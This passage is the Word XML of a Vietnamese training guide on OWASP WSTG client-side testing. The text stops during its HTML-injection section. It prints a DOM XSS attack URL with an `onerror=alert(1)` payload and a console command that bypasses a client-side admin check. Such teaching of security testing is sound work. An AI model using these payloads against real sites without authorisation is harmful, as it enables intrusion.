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DF77" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIÁO TRÌNH: KIỂM THỬ PHÍA MÁY KHÁCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F8A10" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Client-side Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA03346" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu chuẩn:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> OWASP WSTG v4.2 - Chapter 4.11 </w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã kiểm thử:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-01 đến WSTG-CLNT-14 </w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đối tượng:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Pentester, Frontend Developer, QA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBC565" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793079AC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Tổng quan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53B8AE59" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.1 Testing for DOM-Based Cross Site Scripting (WSTG-CLNT-01)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F0577B4" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.2 Testing for JavaScript Execution (WSTG-CLNT-02)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FCE1965" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.3 Testing for HTML Injection (WSTG-CLNT-03)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60B10BD6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.4 Testing for Client-side URL Redirect (WSTG-CLNT-04)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="031FE9E9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.5 Testing for CSS Injection (WSTG-CLNT-05)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A5D48F6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.6 Testing for Client-side Resource Manipulation (WSTG-CLNT-06)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67C503D9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.7 Testing Cross Origin Resource Sharing (WSTG-CLNT-07)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C317DC4" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.8 Testing for Cross Site Flashing (WSTG-CLNT-08)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61B28B30" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.9 Testing for Clickjacking (WSTG-CLNT-09)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1992991D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.10 Testing WebSockets (WSTG-CLNT-10)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2808BDDC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.11 Testing Web Messaging (WSTG-CLNT-11)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72686FF8" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.12 Testing Browser Storage (WSTG-CLNT-12)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B9C6F23" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.13 Testing for Cross Site Script Inclusion (WSTG-CLNT-13)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B6056E0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4.11.14 Testing for Reverse Tabnabbing (WSTG-CLNT-14)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29F19BF4" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:tooltip="null" w:history="1">
        <w:r w:rsidRPr="000A154C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Tài liệu tham khảo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34F8AB8B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TỔNG QUAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9CD69" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Các ứng dụng web hiện đại (SPA - Single Page Application) chuyển dịch phần lớn logic xử lý từ Server về phía Browser của người dùng. Điều này tạo ra một bề mặt tấn công mới nằm hoàn toàn ở Client-side, nơi mà các cơ chế bảo vệ truyền thống như WAF (Web Application Firewall) thường bất lực vì dữ liệu không bao giờ được gửi về server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AA0DC9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.1 Testing for DOM-Based Cross Site Scripting (DOM XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFAD49" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607BE7C" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223635A" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:lastRenderedPageBreak/>
        <w:t>Tìm các lỗ hổng XSS xảy ra do việc xử lý dữ liệu không an toàn trong mã JavaScript (DOM), thay vì từ phía Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A75866" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F71FB0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source (Nguồn):</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Nơi dữ liệu đi vào (VD: location.hash, location.search, document.referrer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B878C96" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sink (Điểm đến):</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Nơi dữ liệu được thực thi hoặc hiển thị (VD: innerHTML, eval(), document.write()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2934AE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cơ chế:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Dữ liệu độc hại đi từ Source -&gt; Sink mà không được làm sạch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D6B70E" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ Minh họa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D393E46" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Code JS: document.getElementById("welcome").innerHTML = location.hash.substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816C105" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>URL tấn công: http://site.com#&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF7C27E" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Kết quả: Trình duyệt lấy phần sau dấu # và chèn vào HTML -&gt; Script chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED4844" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Lab Thực hành: DOM Invader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA5980" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Công cụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Burp Suite (DOM Invader) hoặc Browser DevTools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E488CFE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Mở web, bật DevTools (F12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055D21A" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Tìm kiếm các từ khóa Sink nguy hiểm trong file JS: innerHTML, outerHTML, document.write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A0385" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Thử nhập một chuỗi độc nhất vào URL (abc123xyz) và xem chuỗi đó có chui vào các Sink tìm được không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915B127" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.2 Testing for JavaScript Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2039E29D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B75269" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE17AE1" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Phân tích mã nguồn JavaScript để tìm các logic nguy hiểm, API ẩn, hoặc thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3409CB" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668748F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Đọc code JS (đã được làm đẹp - beautified) để hiểu luồng đi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C542F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Dùng Debugger của trình duyệt để đặt Breakpoint và theo dõi giá trị biến khi chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B467ECB" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ Minh họa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B04FE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Đọc file main.js thấy đoạn code kiểm tra quyền admin ở client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B568B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:lastRenderedPageBreak/>
        <w:t>if (user.isAdmin) { showAdminPanel(); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3FD45" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Hacker mở Console, gõ user.isAdmin = true; showAdminPanel(); để bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0813C2" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.3 Testing for HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EAF58F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB40FF" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C594C80" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra xem ứng dụng có cho phép chèn các thẻ HTML tùy ý vào trang web hay không. Khác với XSS, mục tiêu ở đây có thể chỉ là thay đổi giao diện (Defacement) hoặc lừa đảo (Phishing) mà không cần chạy JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D8D0DA" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Ví dụ &amp; Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0E289" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
